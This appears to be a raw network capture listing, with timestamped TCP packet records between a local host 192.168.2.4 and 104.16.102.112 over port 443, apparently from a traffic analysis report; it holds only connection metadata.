                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.527133942 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.527446985 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.543088913 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544286966 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544326067 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544372082 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544403076 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544445992 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544615984 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544672012 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544709921 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.544717073 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.552704096 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.552757025 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.552778959 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.556163073 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.569305897 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.569385052 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.569406033 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.605093002 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.620145082 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.628643036 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.629168034 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.629194021 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.629264116 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.629332066 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.629368067 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.629429102 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.631179094 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.631345987 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.631409883 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.635345936 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.635366917 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.635411024 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.635425091 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.635452032 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.635469913 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.641275883 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.641290903 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.641360998 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.641376019 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.641463041 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.644253969 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.644262075 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.644335032 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.644351959 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.647428036 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.647450924 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.647500992 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.647515059 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.647542953 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.647562027 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.648916960 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.648977041 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.648991108 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.649054050 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.653167009 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.653187037 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.653234959 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.653249025 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.653289080 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.653310061 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.657840967 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.657846928 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.657910109 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.658525944 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.658549070 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.658622980 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.658637047 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.658710003 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.662638903 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.664860964 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.664879084 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.664931059 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.664947987 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.664974928 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.665047884 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.666138887 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.666146994 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.666203022 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670428991 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670434952 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670491934 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670752048 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670768976 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670816898 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670828104 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670852900 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.670870066 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.679227114 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.679235935 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.679297924 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.687262058 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.687326908 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.693222046 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.693284988 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.696441889 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.696506023 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.702297926 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.702364922 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.705316067 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.705390930 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.711287975 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.711359978 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.712564945 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.712595940 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.717118025 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.717180014 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.739629984 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.739684105 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.739696026 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.749010086 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.749085903 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.749095917 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.756741047 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.756781101 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.756840944 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.756851912 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.757189035 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.764750957 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.772738934 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.772799015 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.772810936 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.781527042 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.781742096 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.781749964 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.789381981 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.789448977 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.789463043 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.797791004 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.797849894 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.797863007 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.805181026 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.805258989 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.805273056 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.817892075 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.817950964 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.817965984 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.824322939 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.824385881 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.824398994 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.828816891 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.829014063 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831166983 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831192970 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831245899 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831273079 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831304073 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831384897 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831779003 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.831846952 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837079048 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837111950 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837151051 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837162971 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837205887 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837205887 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837412119 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.837472916 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.840181112 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.840250969 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.843245029 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.843270063 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.843329906 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.843343019 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.843374014 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.843391895 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.844613075 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.844674110 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.846664906 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.846741915 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.848634005 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.848655939 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.848716974 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.848732948 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.848794937 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.851268053 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.851335049 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.855118990 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.855133057 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.855209112 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.855241060 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.855650902 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.855715990 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.857053041 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.859489918 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.859558105 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.859564066 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.859591961 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.859622955 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.860150099 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.860223055 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.862196922 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.862268925 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.862298012 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.862607956 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.862677097 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.865189075 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.865258932 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.865272999 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.866987944 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.867047071 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.868252039 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.869709969 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.869750977 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.869774103 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.869791985 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.869817019 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.869833946 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.871359110 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.871421099 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.875973940 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.876029968 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.878266096 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.878326893 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.883224010 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.883280993 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.885700941 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.885768890 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.890003920 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.890068054 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.893954992 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.894018888 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.898458958 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.898524046 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.900811911 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.900875092 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.905258894 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.905324936 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.907582998 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.907638073 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.912173986 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.912236929 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.916466951 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.916548014 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.916647911 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.916719913 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.916793108 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.917239904 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.917280912 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.927336931 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.933211088 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.933310032 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.933317900 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.933386087 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.933475971 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.937201023 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.946583986 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.946607113 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.946645021 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.946667910 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.946691990 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.955430984 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.955492020 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.955504894 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.955540895 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.959785938 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.959805012 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.959836960 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.968688965 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.968744040 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.968755960 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.968796015 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.977058887 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.977077961 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.977114916 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.985784054 CET44349758104.16.102.112192.168.2.4
